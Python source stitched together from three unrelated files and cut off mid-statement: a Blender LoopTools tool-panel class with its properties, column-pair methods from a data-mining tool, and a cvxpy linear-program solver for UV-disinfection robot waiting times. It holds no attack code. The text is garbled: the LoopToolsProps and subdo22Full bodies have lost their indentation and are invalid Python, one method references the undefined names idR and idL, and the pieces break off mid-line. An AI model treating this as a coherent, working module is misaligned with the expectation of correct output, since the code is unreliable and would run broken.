        for idname in ("mesh.looptools_circle",
                       "mesh.looptools_curve",
                       "mesh.looptools_flatten"):
            layout.operator(idname)
        loft = layout.operator("mesh.looptools_bridge", text="Loft")
        loft.loft = True
        layout.operator("mesh.looptools_relax")
        layout.operator("mesh.looptools_space")
# panel containing all tools
class VIEW3D_PT_tools_looptools(bpy.types.Panel):
    """Tool-shelf panel exposing every LoopTools operator with its settings.

    Each tool gets a header row (expand arrow + operator button) and, when
    expanded, a box with its settings. Bridge and Loft share the same
    settings; the previously duplicated ~25 lines now live in
    ``_draw_bridge_settings``.
    """
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'TOOLS'
    bl_context = "mesh_edit"
    bl_label = "LoopTools"

    def _draw_tool_header(self, col, lt, toggle_prop, operator, text=None, loft=None):
        """Draw the expand-arrow + operator button line for one tool.

        toggle_prop: name of the boolean display_* property on ``lt``.
        loft: when not None, set the operator's ``loft`` option to this value.
        """
        split = col.split(percentage=0.15)
        icon = 'DOWNARROW_HLT' if getattr(lt, toggle_prop) else 'RIGHTARROW'
        split.prop(lt, toggle_prop, text="", icon=icon)
        if text is not None:
            op = split.operator(operator, text=text)
        else:
            op = split.operator(operator)
        if loft is not None:
            op.loft = loft

    def _draw_bridge_settings(self, col, lt, show_loft_loop):
        """Draw the settings box shared by the Bridge and Loft tools.

        show_loft_loop: include the "Loop" toggle (Loft only).
        """
        box = col.column(align=True).box().column()
        # top row: segment count (left) and minimum width (right)
        col_top = box.column(align=True)
        row = col_top.row(align=True)
        col_left = row.column(align=True)
        col_right = row.column(align=True)
        # width/interpolation only matter when more than one segment is made
        col_right.active = lt.bridge_segments != 1
        col_left.prop(lt, "bridge_segments")
        col_right.prop(lt, "bridge_min_width", text="")
        # bottom row: interpolation mode and cubic strength
        bottom_left = col_left.row()
        bottom_left.active = lt.bridge_segments != 1
        bottom_left.prop(lt, "bridge_interpolation", text="")
        bottom_right = col_right.row()
        bottom_right.active = lt.bridge_interpolation == 'cubic'
        bottom_right.prop(lt, "bridge_cubic_strength")
        # boolean properties
        col_top.prop(lt, "bridge_remove_faces")
        if show_loft_loop:
            col_top.prop(lt, "bridge_loft_loop")
        # override properties
        col_top.separator()
        row = box.row(align=True)
        row.prop(lt, "bridge_twist")
        row.prop(lt, "bridge_reverse")

    def draw(self, context):
        layout = self.layout
        col = layout.column(align=True)
        lt = context.window_manager.looptools
        # bridge
        self._draw_tool_header(col, lt, "display_bridge",
                               "mesh.looptools_bridge", text="Bridge", loft=False)
        if lt.display_bridge:
            self._draw_bridge_settings(col, lt, show_loft_loop=False)
        # circle
        self._draw_tool_header(col, lt, "display_circle", "mesh.looptools_circle")
        if lt.display_circle:
            box = col.column(align=True).box().column()
            box.prop(lt, "circle_fit")
            box.separator()
            box.prop(lt, "circle_flatten")
            row = box.row(align=True)
            row.prop(lt, "circle_custom_radius")
            row_right = row.row(align=True)
            row_right.active = lt.circle_custom_radius
            row_right.prop(lt, "circle_radius", text="")
            box.prop(lt, "circle_regular")
            box.separator()
            box.prop(lt, "circle_influence")
        # curve
        self._draw_tool_header(col, lt, "display_curve", "mesh.looptools_curve")
        if lt.display_curve:
            box = col.column(align=True).box().column()
            box.prop(lt, "curve_interpolation")
            box.prop(lt, "curve_restriction")
            box.prop(lt, "curve_boundaries")
            box.prop(lt, "curve_regular")
            box.separator()
            box.prop(lt, "curve_influence")
        # flatten
        self._draw_tool_header(col, lt, "display_flatten", "mesh.looptools_flatten")
        if lt.display_flatten:
            box = col.column(align=True).box().column()
            box.prop(lt, "flatten_plane")
            #box.prop(lt, "flatten_restriction")
            box.separator()
            box.prop(lt, "flatten_influence")
        # loft (same operator as bridge, with loft=True and the extra Loop toggle)
        self._draw_tool_header(col, lt, "display_loft",
                               "mesh.looptools_bridge", text="Loft", loft=True)
        if lt.display_loft:
            self._draw_bridge_settings(col, lt, show_loft_loop=True)
        # relax
        self._draw_tool_header(col, lt, "display_relax", "mesh.looptools_relax")
        if lt.display_relax:
            box = col.column(align=True).box().column()
            box.prop(lt, "relax_interpolation")
            box.prop(lt, "relax_input")
            box.prop(lt, "relax_iterations")
            box.prop(lt, "relax_regular")
        # space
        self._draw_tool_header(col, lt, "display_space", "mesh.looptools_space")
        if lt.display_space:
            box = col.column(align=True).box().column()
            box.prop(lt, "space_interpolation")
            box.prop(lt, "space_input")
            box.separator()
            box.prop(lt, "space_influence")
# property group containing all properties for the gui in the panel
class LoopToolsProps(bpy.types.PropertyGroup):
"""
Fake module like class
bpy.context.window_manager.looptools
"""
# general display properties
display_bridge = bpy.props.BoolProperty(name = "Bridge settings",
description = "Display settings of the Bridge tool",
default = False)
display_circle = bpy.props.BoolProperty(name = "Circle settings",
description = "Display settings of the Circle tool",
default = False)
display_curve = bpy.props.BoolProperty(name = "Curve settings",
description = "Display settings of the Curve tool",
default = False)
display_flatten = bpy.props.BoolProperty(name = "Flatten settings",
description = "Display settings of the Flatten tool",
default = False)
display_loft = bpy.props.BoolProperty(name = "Loft settings",
description = "Display settings of the Loft tool",
default = False)
display_relax = bpy.props.BoolProperty(name = "Relax settings",
description = "Display settings of the Relax tool",
default = False)
display_space = bpy.props.BoolProperty(name = "Space settings",
description = "Display settings of the Space tool",
default = False)
# bridge properties
bridge_cubic_strength = bpy.props.FloatProperty(name = "Strength",
description = "Higher strength results in more fluid curves",
default = 1.0,
soft_min = -3.0,
soft_max = 3.0)
bridge_interpolation = bpy.props.EnumProperty(name = "Interpolation mode",
items = (('cubic', "Cubic", "Gives curved results"),
('linear', "Linear", "Basic, fast, straight interpolation")),
description = "Interpolation mode: algorithm used when creating "\
"segments",
default = 'cubic')
bridge_loft = bpy.props.BoolProperty(name = "Loft",
description = "Loft multiple loops, instead of considering them as "\
"a multi-input for bridging",
default = False)
bridge_loft_loop = bpy.props.BoolProperty(name = "Loop",
description = "Connect the first and the last loop with each other",
default = False)
bridge_min_width = bpy.props.IntProperty(name = "Minimum width",
description = "Segments with an edge smaller than this are merged "\
"(compared to base edge)",
default = 0,
min = 0,
max = 100,
subtype = 'PERCENTAGE')
bridge_mode = bpy.props.EnumProperty(name = "Mode",
items = (('basic', "Basic", "Fast algorithm"),
('shortest', "Shortest edge", "Slower algorithm | |
= col.getLiteralSeg(False, segments[op], best[-1][-1])
if best[-1][-1] is not None:
cands.append(Extension(self.constraints.getSSetts(), best))
return cands
################################################################### PAIRS METHODS
###################################################################
def computePair(self, colL, colR):
    """Compute candidate literal pairs for a column pair.

    Dispatches to the ``do<minType><maxType>`` method selected by the two
    columns' type ids. When the left column has the larger type id the
    handler is called with the sides flipped, and the returned literal
    lists are swapped back so the result is always in (left, right) order.

    Returns (scores, literalsL, literalsR).
    """
    min_type = min(colL.typeId(), colR.typeId())
    max_type = max(colL.typeId(), colR.typeId())
    method_name = 'do%i%i' % (min_type, max_type)
    try:
        # getattr-based dispatch; the previous eval() on a built string was
        # both slower and an injection hazard if type ids ever came from data
        method_compute = getattr(self, method_name)
    except AttributeError:
        raise Exception('Oups this combination does not exist (%i %i)!' % (min_type, max_type))
    if colL.typeId() == min_type:
        (scores, literalsL, literalsR) = method_compute(colL, colR, 1)
    else:
        (scores, literalsR, literalsL) = method_compute(colL, colR, 0)
    return (scores, literalsL, literalsR)
def doBoolStar(self, colL, colR, side):
    """Pair a Boolean column with a column of any other type.

    The Boolean column (chosen by ``side``) is frozen into a BoolTerm and
    its support seeds the parts structure; the other column is then fitted
    against those parts.
    """
    if side == 1:
        fixed_col, ext_col = colL, colR
        init_parts = [colL.supp(), set()]
    else:
        fixed_col, ext_col = colR, colL
        init_parts = [set(), colR.supp()]
    supports = SParts(self.constraints.getSSetts(), colL.nbRows(), init_parts)
    fix_term = BoolTerm(fixed_col.getId())
    return self.fit(ext_col, supports, side, fix_term)
def fit(self, col, supports, side, termX):
    """Find cover candidates for ``col`` against the given supports.

    Returns three parallel lists: accuracies, literals wrapping the fixed
    term ``termX``, and the extension literals found on ``col``.
    """
    lparts = supports.lparts()
    cands = self.findCover(side, col, lparts, supports, init=1)
    scores = [cand[1].getAcc() for cand in cands]
    literalsFix = [Literal(cand[0], termX) for cand in cands]
    literalsExt = [cand[1].getLiteral() for cand in cands]
    return (scores, literalsFix, literalsExt)
def do11(self, colL, colR, side):
    # Boolean x Boolean pair: delegate to the generic Bool-vs-any handler
    return self.doBoolStar(colL, colR, side)
def do12(self, colL, colR, side):
    # Boolean x categorical pair
    return self.doBoolStar(colL, colR, side)
def do13(self, colL, colR, side):
    # Boolean x numerical pair
    return self.doBoolStar(colL, colR, side)
def do22(self, colL, colR, side):
    # categorical x categorical pair
    return self.subdo22Full(colL, colR, side)
def do23(self, colL, colR, side):
    # categorical x numerical pair
    return self.subdo23Full(colL, colR, side)
def do33(self, colL, colR, side):
    """Numerical x numerical pair.

    Only runs the full bucket-based search when the two columns' non-mode
    supports overlap enough to possibly satisfy the min_itm_in constraint;
    otherwise no candidate can qualify, so return empty results at once.
    """
    overlap = len(colL.interNonMode(colR.nonModeSupp()))
    if overlap < self.constraints.getCstr("min_itm_in"):
        return ([], [], [])
    return self.subdo33Full(colL, colR, side)
def subdo33Heur(self, colL, colR, side):
    """Heuristic numerical x numerical pairing, suitable for sparse data.

    Fits one side first, then refits the other side against each candidate
    literal, keeping only the single best-scoring pair found in either
    direction.

    NOTE(review): this method is currently unused (``do33`` always takes
    the full route) and references two undefined names, ``idR`` and
    ``idL`` -- presumably placeholder terms for the not-yet-fitted column.
    Confirm their intended values before re-enabling this path.
    """
    bestScore = None
    # Initialize results so an empty candidate set returns cleanly instead
    # of raising UnboundLocalError at the final return.
    (scores, literalsL, literalsR) = ([], [], [])
    if True: ### DOABLE
        ## FIT LHS then RHS
        supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [set(), colR.nonModeSupp()])
        (scoresL, literalsFixL, literalsExtL) = self.fit(colL, supports, 0, idR)
        for tL in literalsExtL:
            suppL = colL.suppLiteral(tL)
            supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [suppL, set()])
            (scoresR, literalsFixR, literalsExtR) = self.fit(colR, supports, 1, tL)
            for i in range(len(scoresR)):
                if scoresR[i] > bestScore:
                    (scores, literalsL, literalsR) = ([scoresR[i]], [literalsFixR[i]], [literalsExtR[i]])
                    bestScore = scoresR[i]
        ## FIT RHS then LHS
        supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [colL.nonModeSupp(), set()])
        (scoresR, literalsFixR, literalsExtR) = self.fit(colR, supports, 1, idL)
        for tR in literalsExtR:
            suppR = colR.suppLiteral(tR)
            supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [set(), suppR])
            (scoresL, literalsFixL, literalsExtL) = self.fit(colL, supports, 0, tR)
            for i in range(len(scoresL)):
                if scoresL[i] > bestScore:
                    # FIX: the recorded score must come from the L-side fit
                    # being examined; previously this stored scoresR[i],
                    # a leftover value from the other direction.
                    (scores, literalsL, literalsR) = ([scoresL[i]], [literalsExtL[i]], [literalsFixL[i]])
                    bestScore = scoresL[i]
    # if len(scores) > 0:
    #     print "%f: %s <-> %s" % (scores[0], literalsA[0], literalsB[0])
    return (scores, literalsL, literalsR)
def subdo33Full(self, colL, colR, side):
    """Exhaustive numerical x numerical pairing over bucketized values.

    Buckets both columns (F = the side with fewer buckets, E = the other),
    collapsing buckets or falling back to a categorical encoding when the
    product of bucket counts would exceed ``max_prodbuckets``, then sweeps
    every pair of bucket intervals and keeps the best candidates.

    Returns (scores, literalsL, literalsR) in the caller's original
    left/right order (``flip_side`` undoes the F/E swap).
    """
    ## print "SUBDO 33 FULL", colL.getId(), colR.getId()
    best = []
    # bucket-threshold selectors; switched to 3 when buckets get collapsed
    bUpE=1
    bUpF=1
    interMat = []
    bucketsL = colL.buckets()
    bucketsR = colR.buckets()
    # F takes the side with fewer buckets; remember whether L/R were swapped
    if len(bucketsL[0]) > len(bucketsR[0]):
        bucketsF = bucketsR; colF = colR; bucketsE = bucketsL; colE = colL; side = 1-side; flip_side = True
    else:
        bucketsF = bucketsL; colF = colL; bucketsE = bucketsR; colE = colR; flip_side = False
    (scores, literalsF, literalsE) = ([], [], [])
    ## DOABLE
    # print "Nb buckets: %i x %i"% (len(bucketsF[1]), len(bucketsE[1]))
    # if ( len(bucketsF[1]) * len(bucketsE[1]) > self.constraints.getCstr("max_prodbuckets") ):
    # nbb = budget of E-side buckets keeping the product within bounds
    nbb = self.constraints.getCstr("max_prodbuckets") / float(len(bucketsF[1]))
    if len(bucketsE[1]) > nbb: ## self.constraints.getCstr("max_sidebuckets"):
        if len(bucketsE[1])/nbb < self.constraints.getCstr("max_agg"):
            ### collapsing buckets on the largest side is enough to get within the reasonable size
            bucketsE = colE.collapsedBuckets(self.constraints.getCstr("max_agg"), nbb)
            bUpE=3 ## in case of collapsed bucket the threshold is different
        else:
            ### collapsing buckets on the largest side is NOT enough to get within the reasonable size
            bucketsE = None
            #### try cats
            # keep only buckets whose support satisfies both min-items constraints
            bbs = [dict([(bi, es) for (bi, es) in enumerate(bucketsL[0]) \
                         if ( len(es) > self.constraints.getCstr("min_itm_in") and \
                              colL.nbRows() - len(es) > self.constraints.getCstr("min_itm_out"))]),
                   dict([(bi, es) for (bi, es) in enumerate(bucketsR[0]) \
                         if ( len(es) > self.constraints.getCstr("min_itm_in") and \
                              colR.nbRows() - len(es) > self.constraints.getCstr("min_itm_out"))])]
            ## if len(bbs[0]) > 0 and ( len(bbs[1]) == 0 or len(bbs[0])/float(len(bucketsL[0])) < len(bbs[1])/float(len(bucketsR[0]))):
            # average rows per usable bucket on each side (.5 floor avoids /0)
            nbes = [float(max(sum([len(v) for (k,v) in bbs[s].items()]), .5)) for s in [0,1]]
            side = None
            # pick the side whose usable buckets cover more rows on average
            if len(bbs[0]) > 0 and ( len(bbs[1]) == 0 or nbes[0]/len(bbs[0]) > nbes[1]/len(bbs[1]) ):
                ccL, ccR, side = (CatColM(bbs[0], colL.nbRows(), colL.miss()), colR, 1)
            elif len(bbs[1]) > 0:
                ccL, ccR, side = (colL, CatColM(bbs[1], colR.nbRows(), colR.miss()), 0)
            if side is not None:
                #### working with on variable as categories is workable
                ## print "Trying cats...", len(bucketsL[0]), len(bucketsR[0]), len(bbs[0]), len(bbs[1])
                (scores, literalsFix, literalsExt) = self.subdo23Full(ccL, ccR, side)
                # map the categorical literals back onto numerical interval terms
                if side == 1:
                    literalsL = []
                    literalsR = literalsExt
                    for ltc in literalsFix:
                        val = bucketsL[1][ltc.getTerm().getCat()]
                        literalsL.append( Literal(ltc.isNeg(), NumTerm(colL.getId(), val, val)) )
                else:
                    literalsL = literalsExt
                    literalsR = []
                    for ltc in literalsFix:
                        val = bucketsR[1][ltc.getTerm().getCat()]
                        literalsR.append( Literal(ltc.isNeg(), NumTerm(colR.getId(), val, val)) )
                return (scores, literalsL, literalsR)
            else:
                #### working with on variable as categories is NOT workable
                ### the only remaining solution is aggressive collapse of buckets on both sides
                nbb = numpy.sqrt(self.constraints.getCstr("max_prodbuckets"))
                bucketsE = colE.collapsedBuckets(self.constraints.getCstr("max_agg"), nbb)
                bUpE=3 ## in case of collapsed bucket the threshold is different
                bucketsF = colF.collapsedBuckets(self.constraints.getCstr("max_agg"), nbb)
                bUpF=3 ## in case of collapsed bucket the threshold is different
                ## print "Last resort solution...", nbb, len(bucketsL[0]), len(bucketsR[0])
                ## print "buckets lengths\t(0,%d) %d\t(1,%d) %d\tcollapsed %d -- product %d" % (colL.id, len(bucketsL[1]), colR.id, len(bucketsR[1]), len(bucketsE[1]), len(bucketsF[1]) * len(bucketsE[1]))
    if bucketsE is not None and ( len(bucketsF[1]) * len(bucketsE[1]) < self.constraints.getCstr("max_prodbuckets") ):
        ## print "Trying buckets...", len(bucketsF[0]), len(bucketsE[0])
        totInt = colE.nbRows()
        #margE = [len(intE) for intE in bucketsE[0]]
        margF = [len(bucketsF[0][i]) for i in range(len(bucketsF[0]))]
        # contingency matrix: rows = F buckets, columns = E buckets
        for bukF in bucketsF[0]:
            interMat.append([len(bukF & bukE) for bukE in bucketsE[0]])
        # fold each column's mode rows (stored outside the buckets) back in
        if bucketsF[2] is not None :
            margF[bucketsF[2]] += colF.lenMode()
            for bukEId in range(len(bucketsE[0])):
                interMat[bucketsF[2]][bukEId] += len(colF.interMode(bucketsE[0][bukEId]))
        if bucketsE[2] is not None :
            #margE[bucketsE[2]] += colE.lenMode()
            for bukFId in range(len(bucketsF[0])):
                interMat[bukFId][bucketsE[2]] += len(colE.interMode(bucketsF[0][bukFId]))
        if bucketsF[2] is not None and bucketsE[2] is not None:
            interMat[bucketsF[2]][bucketsE[2]] += len(colE.interMode(colF.modeSupp()))
        # ### check marginals
        # totF = 0
        # for iF in range(len(bucketsF[0])):
        #     sF = sum(interMat[iF])
        #     if sF != margF[iF]:
        #         raise Error('Error in computing the marginals (1)')
        #     totF += sF
        # totE = 0
        # for iE in range(len(bucketsE[0])):
        #     sE = sum([intF[iE] for intF in interMat])
        #     if sE != margE[iE]:
        #         raise Error('Error in computing the marginals (2)')
        #     totE += sE
        # if totE != totF or totE != colE.nbRows():
        #     raise Error('Error in computing the marginals (3)')
        # Sweep all [lowF,upF] x [lowE,upE] interval pairs, pruning with the
        # min_itm_in / min_itm_out support constraints as the bounds move.
        belowF = 0
        lowF = 0
        while lowF < len(interMat) and totInt - belowF >= self.constraints.getCstr("min_itm_in"):
            aboveF = 0
            upF = len(interMat)-1
            while upF >= lowF and totInt - belowF - aboveF >= self.constraints.getCstr("min_itm_in"):
                if belowF + aboveF >= self.constraints.getCstr("min_itm_out"):
                    EinF = [sum([interMat[iF][iE] for iF in range(lowF,upF+1)]) for iE in range(len(interMat[lowF]))]
                    # NOTE: range()+range() concatenation below is Python 2 only
                    EoutF = [sum([interMat[iF][iE] for iF in range(0,lowF)+range(upF+1,len(interMat))]) for iE in range(len(interMat[lowF]))]
                    #totEinF = sum(EinF)
                    fixed_colors = [[0, 0],[totInt - aboveF - belowF, aboveF + belowF]]
                    belowEF = 0
                    outBelowEF = 0
                    lowE = 0
                    while lowE < len(interMat[lowF]) and totInt - belowF - aboveF - belowEF >= self.constraints.getCstr("min_itm_in"):
                        aboveEF = 0
                        outAboveEF = 0
                        upE = len(interMat[lowF])-1
                        while upE >= lowE and totInt - belowF - aboveF - belowEF - aboveEF >= self.constraints.getCstr("min_itm_in"):
                            var_colors = [totInt - belowF - aboveF - belowEF - aboveEF, belowF + aboveF - outAboveEF - outBelowEF]
                            best = self.updateACTColorsP33(best, (lowF, upF, lowE, upE), side, True, False, fixed_colors, var_colors)
                            aboveEF+=EinF[upE]
                            outAboveEF+=EoutF[upE]
                            upE-=1
                        belowEF+=EinF[lowE]
                        outBelowEF+=EoutF[lowE]
                        lowE+=1
                aboveF+=margF[upF]
                upF-=1
            belowF+=margF[lowF]
            lowF+=1
    # turn the best interval tuples back into bucket literals; b[-1][-1] holds
    # (lowF, upF, lowE, upE)
    for b in best:
        tF = colF.getLiteralBuk(False, bucketsF[1], b[-1][-1][0:2], bucketsF[bUpF])
        tE = colE.getLiteralBuk(False, bucketsE[1], b[-1][-1][2:], bucketsE[bUpE])
        if tF is not None and tE is not None:
            literalsF.append(tF)
            literalsE.append(tE)
            scores.append(b[0][0])
    if flip_side:
        return (scores, literalsE, literalsF)
    else:
        return (scores, literalsF, literalsE)
def subdo22Full(self, colL, colR, side):
##### THIS NEEDS CHANGE PARTS
configs = [(0, False, False), (1, False, True), (2, True, False), (3, True, True)]
if True not in self.constraints.getCstr("neg_query", side=side, type_id=2):
configs = configs[:1]
best = [[] for c in configs]
tot = colL.nbRows()
for catL in colL.cats():
totL = len(colL.suppCat(catL))
lparts = [0, totL, 0, colL.nbRows()-totL]
for catR in colR.cats():
totR = len(colR.suppCat(catR))
interLR = len(colL.suppCat(catL) & colR.suppCat(catR))
lin = [0, interLR, 0, totR - | |
<filename>final_pipeline/lp_solver.py
import cvxpy as cp
import numpy as np
import geopandas as gpd
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
import matplotlib.cm as cm
from shapely.geometry import box, Point, LineString, Polygon, MultiPolygon
import shapely.geometry
from shapely.affinity import scale
from shapely.prepared import prep
from scipy.spatial import distance_matrix
from matplotlib.animation import FuncAnimation
from numpy.linalg import norm
from sys import exit
from shapely.ops import transform, unary_union
# Try to load skgeom package (for naive solution)
SKGEOM_AVAIL = False
try:
from skgeom import *
SKGEOM_AVAIL = True
except ImportError as e:
pass
from branch_and_bound import branch_bound_poly
EPS = 1e-5 # Arbitrary small number to avoid rounding error
def solve_full_lp(room,
                  robot_height,
                  robot_radius,
                  robot_power,
                  use_weak_everything,
                  use_strong_visibility,
                  use_strong_distances,
                  scaling_method,
                  min_intensity,
                  show_visualization,
                  use_shadow):
    """Solve the LP minimizing total robot waiting time subject to every
    reachable room point receiving at least ``min_intensity``.

    Returns (solution_time, waiting_times, intensities_T, unguarded_room_idx,
    disinfected_region, percent_disinfected). Exits the process if the LP is
    infeasible.
    """
    intensity_tuple = get_intensities(room,
                                      robot_height,
                                      robot_radius,
                                      robot_power,
                                      use_weak_everything,
                                      use_strong_visibility,
                                      use_strong_distances,
                                      show_visualization,
                                      use_shadow)
    room_intensities, unguarded_room_idx = intensity_tuple
    # One waiting-time variable per candidate robot (guard) location.
    loc_times = cp.Variable(room.guard_grid.shape[0])
    obj = cp.Minimize(cp.sum(loc_times))
    constraints = [
        room_intensities.T @ loc_times >= min_intensity,
        loc_times >= 0
    ]
    prob = cp.Problem(obj, constraints=constraints)
    prob.solve(solver='ECOS')
    # Report if problem is infeasible
    if prob.status == 'infeasible':
        exit('ERROR: Problem is infeasible')
    # FIX: the previous call passed unguarded_room_idx twice (six positional
    # arguments), which raised a TypeError against the five-parameter
    # signature of calculate_percent_disinfected.
    disinfected_region, percent_disinfected = calculate_percent_disinfected(
        room,
        unguarded_room_idx,
        loc_times.value,
        use_strong_distances,
        use_weak_everything)
    unscaled_time = loc_times.value.sum()
    # Renamed from `scale` to avoid shadowing shapely.affinity.scale,
    # which is imported at module level.
    scale_factor = get_scale(room, min_intensity, disinfected_region, loc_times.value,
                             scaling_method, robot_power, robot_height, robot_radius, use_shadow)
    solution_time = scale_factor * unscaled_time
    # TODO: Filter for significant points
    return solution_time, loc_times.value, room_intensities.T, unguarded_room_idx, disinfected_region, percent_disinfected
def calculate_percent_disinfected(room, not_visible_room_idx, waiting_times, use_strong_distances, use_weak_everything):
    """Compute the guaranteed-disinfected region and its share of room area.

    With strong/weak guarantees the region is the union of all grid cells
    not flagged unreachable; otherwise it is the union of the visibility
    polygons of every robot position with a non-negligible waiting time.

    Returns (disinfected_region, percent_disinfected).
    """
    # If we use strong/weak visibility, we guarantee disinfection in discrete
    # grid cells (the epsilon-neighborhoods)
    if use_strong_distances or use_weak_everything:
        visible_cells = [cell for idx, cell in enumerate(room.full_room_cells)
                         if idx not in not_visible_room_idx]
        disinfected_region = unary_union(visible_cells)
    # Otherwise, assume we use branch-and-bound to scale up solution
    else:
        print("""
Note: When calculating percent disinfected, we assume that
a branch-and-bound method will be used to scale the solution
appropriately.""")
        # HARDCODED: Ignore points where we wait less than a millisecond
        vis_preprocessing = compute_skgeom_visibility_preprocessing(room.room)
        waiting_points = [pt for idx, pt in enumerate(room.guard_grid)
                          if waiting_times[idx] > 1e-3]
        visibility_polygons = [compute_visibility_polygon(vis_preprocessing, pt)
                               for pt in waiting_points]
        disinfected_region = shapely.ops.unary_union(visibility_polygons).simplify(0.001)
    area_disinfected = disinfected_region.area
    total_area = room.room.area
    percent_disinfected = (area_disinfected/total_area) * 100
    print("Percent of room that can be disinfected: {:.2f}%".format(percent_disinfected))
    return disinfected_region, percent_disinfected
def visualize_times(room, waiting_times, unguarded_room_idx):
    """Plot the room with guard waiting times and problem cells.

    Guard points are drawn as circles sized by waiting time; cells that
    cannot be illuminated are filled dark red; cells no guard point lies
    inside (yet not flagged unguarded) are filled blue.
    """
    ax = plt.axes()
    ax.axis('equal')
    # Plot room (image and polygon)
    ax.imshow(room.room_img)
    ax.plot(*transform(room.xy_to_pixel, room.room).exterior.xy, 'black')
    # Plot guard points
    guard_points_x = [room.xy_to_pixel(x, y)[0] for x, y in room.guard_grid]
    guard_points_y = [room.xy_to_pixel(x, y)[1] for x, y in room.guard_grid]
    ax.scatter(guard_points_x, guard_points_y, s = waiting_times / 10, facecolors = 'none', edgecolors = 'r')
    # Plot unguarded regions
    unguarded = [room.full_room_cells[i] for i in unguarded_room_idx]
    for idx, cell in zip(unguarded_room_idx, unguarded):
        if room.full_room_iswall[idx] == 0:
            ax.fill(*transform(room.xy_to_pixel, cell).exterior.xy, "darkred", alpha = 0.6)
        elif room.full_room_iswall[idx] == 1:
            ax.fill(*transform(room.xy_to_pixel, cell).xy, "darkred", alpha = 0.6)
        else:
            raise Exception("Unable to classify room cell: ", cell)
    # Plot unenterable regions
    unenterable_indices = []
    for i, room_cell in enumerate(room.full_room_cells):
        is_visible = False
        prep_room_cell = prep(room_cell)
        for guard_pt in room.guard_grid:
            if prep_room_cell.contains(Point(*guard_pt)):
                is_visible = True
                break
        if not is_visible and i not in unguarded_room_idx:
            # FIX: previously appended to the undefined name `unenterable`,
            # raising NameError whenever such a cell existed.
            unenterable_indices.append(i)
    for idx in unenterable_indices:
        if room.full_room_iswall[idx] == 0:
            ax.fill(*transform(room.xy_to_pixel, room.full_room_cells[idx]).exterior.xy, "b", alpha = 0.6)
        elif room.full_room_iswall[idx] == 1:
            ax.fill(*transform(room.xy_to_pixel, room.full_room_cells[idx]).xy, "b", alpha = 0.6)
        else:
            raise Exception("Unable to classify room cell: ", room.full_room_cells[idx])
    plt.show()
def visualize_energy(room, waiting_times, intensities, threshold):
    """Shade each room cell by the UV energy per area it receives.

    Darker shades mean the dose is closer to the required threshold;
    cells at exactly the threshold are printed and drawn darkest.
    """
    axes = plt.axes()
    axes.axis('equal')
    # Room backdrop: photo plus outline polygon
    axes.imshow(room.room_img)
    axes.plot(*transform(room.xy_to_pixel, room.room).exterior.xy, 'black')
    for idx, cell in enumerate(room.full_room_cells):
        dose = intensities[idx] @ waiting_times
        if dose == threshold:
            print("EXACTLY THRESHOLD: ", room.full_room_grid[idx])
            shade = cm.YlGnBu(1)
        elif dose <= threshold * 1.2:
            shade = cm.YlGnBu(0.75)
        elif dose <= threshold * 1.5:
            shade = cm.YlGnBu(0.5)
        else:
            shade = cm.YlGnBu(0.25)
        wall_flag = room.full_room_iswall[idx]
        if wall_flag == 0:
            axes.fill(*transform(room.xy_to_pixel, cell).exterior.xy, color = shade)
        elif wall_flag == 1:
            axes.fill(*transform(room.xy_to_pixel, cell).xy, color = shade)
        else:
            raise Exception("Unable to classify room cell: ", cell)
    plt.show()
def visualize_distance(room, waiting_times, intensities):
    """Shade each cell by the disinfection-weighted mean distance to the robot.

    Darker cells receive most of their dose from far-away robot positions.
    """
    axes = plt.axes()
    axes.axis('equal')
    # Room backdrop: photo plus outline polygon
    axes.imshow(room.room_img)
    axes.plot(*transform(room.xy_to_pixel, room.room).exterior.xy, 'black')
    # Upper bound on maximum distance between any two points
    # Used as a heuristic for scaling
    max_dist = room.room.centroid.hausdorff_distance(room.room)
    for idx, cell in enumerate(room.full_room_cells):
        dose_weights = np.multiply(intensities[idx], waiting_times)
        dists = [norm(room.full_room_grid[idx] - robot_loc) for robot_loc in room.guard_grid]
        mean_dist = np.average(dists, weights = dose_weights)
        shade = cm.YlGnBu(mean_dist/max_dist)
        if room.full_room_iswall[idx] == 0:
            axes.fill(*transform(room.xy_to_pixel, cell).exterior.xy, color = shade)
        elif room.full_room_iswall[idx] == 1:
            axes.fill(*transform(room.xy_to_pixel, cell).xy, color = shade)
        else:
            raise Exception("Unable to classify room cell: ", cell)
    plt.show()
# Intensity is power transmitted per unit area
def get_intensities(room, robot_height, robot_radius, robot_power, use_weak_everything = False, use_strong_visibility = True, use_strong_distances = True, show_visualization = True, use_shadow = True):
    """Build the (guard points x room points) intensity matrix.

    Each entry is the UV power per unit area a room point receives from a
    robot at a guard point, accounting for inverse-square falloff,
    Lambert's cosine law, the robot's own shadow, and line-of-sight
    visibility. Room points no guard point can illuminate are flagged and
    given a fake intensity of ``robot_power`` so the LP effectively
    ignores them.

    Returns (room_intensities, not_visible_room_idx).
    """
    # Construct initial intensities matrix, ignoring visibility
    # *Do* account for inverse distance, angle, and robot shadow
    num_guard_points = room.guard_grid.shape[0]
    num_room_points = room.full_room_grid.shape[0]
    room_intensities = np.zeros(shape = (num_guard_points, num_room_points))
    for guard_idx, guard_pt in enumerate(room.guard_grid):
        if guard_idx % 50 == 0: print("Getting intensity for guard point: {}/{}".format(guard_idx, room.guard_grid.shape[0]))
        for room_idx, room_pt in enumerate(room.full_room_grid):
            # Pick the 2D distance convention matching the guarantee mode:
            # weak uses the room point vs the whole guard cell, strong uses
            # the guard point vs the whole room cell, otherwise point-to-point.
            if use_weak_everything:
                guard_cell = room.guard_cells[guard_idx]
                distance_2d = Point(room_pt).distance(guard_cell)
                dist_for_shadow = Point(room_pt).hausdorff_distance(guard_cell)
            elif use_strong_distances:
                room_cell = room.full_room_cells[room_idx]
                distance_2d = Point(guard_pt).hausdorff_distance(room_cell)
                dist_for_shadow = Point(guard_pt).distance(room_cell) # Shortest distance: worst case scenario
            else:
                distance_2d = norm(guard_pt - room_pt)
                dist_for_shadow = distance_2d
            # Incidence angle differs for wall cells (vertical surfaces)
            # versus floor cells (horizontal surfaces).
            if room.full_room_iswall[room_idx]:
                angle = np.pi/2 if distance_2d == 0 else np.arctan(robot_height/distance_2d)
            else:
                angle = 0 if distance_2d == 0 else np.pi/2 - np.arctan(robot_height/distance_2d)
            # Account for robot shadow
            if use_shadow and dist_for_shadow < robot_radius:
                room_intensities[guard_idx, room_idx] = 0
